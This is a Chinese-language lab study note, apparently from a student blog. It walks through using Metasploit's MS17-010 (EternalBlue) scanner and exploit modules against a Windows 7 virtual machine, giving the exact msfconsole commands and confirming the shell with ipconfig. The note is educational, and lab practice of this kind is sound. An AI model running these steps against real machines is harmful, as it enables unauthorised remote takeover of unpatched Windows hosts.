metaspolite 永恒之蓝 的利用

环境(两台虚拟机):
攻击机(kali):192.168.31.255
目标机(win 7):192.168.31.230

试了好几遍,总是最后一步有问题,显示 no session was created
然后询问了学长,指出本机一定要ping通目标机器,这里就要设置目标机器的一些东西:
打开目标机器的 文件和打印机共享
metaspolite 永恒之蓝 的利用_第1张图片一般要先开启 数据库
service postgresql status
service postgresql restart
如果此时报错的话,就初始化一下数据库
msfdb init

好的好的,终于一切准备工作做好了,然后开始,打开msf
直接输入msfconsole
metaspolite 永恒之蓝 的利用_第2张图片 查找:search ms17_010
metaspolite 永恒之蓝 的利用_第3张图片利用 use auxiliary/scanner/smb/smb_ms17_010
show options
在 required 下面是yes的都要有值,一般是选默认值,但是RHOSTS肯定要写目标机器的ip
metaspolite 永恒之蓝 的利用_第4张图片设置目标主机ip set RHOSTS 192.168.31.230
运行run
run是小写!小写! 小写!
metaspolite 永恒之蓝 的利用_第5张图片查看存在此漏洞,于是开始利用攻击漏洞
use exploit/windows/smb/ms17_010_eternalblue
show options

metaspolite 永恒之蓝 的利用_第6张图片set RHOSTS 192.168.31.230
run
可以看下图先是是失败了,然后后来再次连接就成功了。
metaspolite 永恒之蓝 的利用_第7张图片图没截完,补上下半部分
metaspolite 永恒之蓝 的利用_第8张图片在验证一下是否成功,就是输入ipconfig
metaspolite 永恒之蓝 的利用_第9张图片的确显示的是目标机器的IP,看来成功无疑了

然后成功之后,就可以做自己想做的一些事情了

附上linux命令大全
https://www.runoob.com/linux/linux-command-manual.html

metaspolite 永恒之蓝 的利用_第10张图片metaspolite 永恒之蓝 的利用_第11张图片metaspolite 永恒之蓝 的利用_第12张图片metaspolite 永恒之蓝 的利用_第13张图片
再附上msf常见指令

msf帮助菜单:
metaspolite 永恒之蓝 的利用_第14张图片
metaspolite 永恒之蓝 的利用_第15张图片metaspolite 永恒之蓝 的利用_第16张图片metaspolite 永恒之蓝 的利用_第17张图片okkkk,学习笔记就写到这里了,写的有问题的地方,还请各位大佬批评指正。

你可能感兴趣的:(工具类)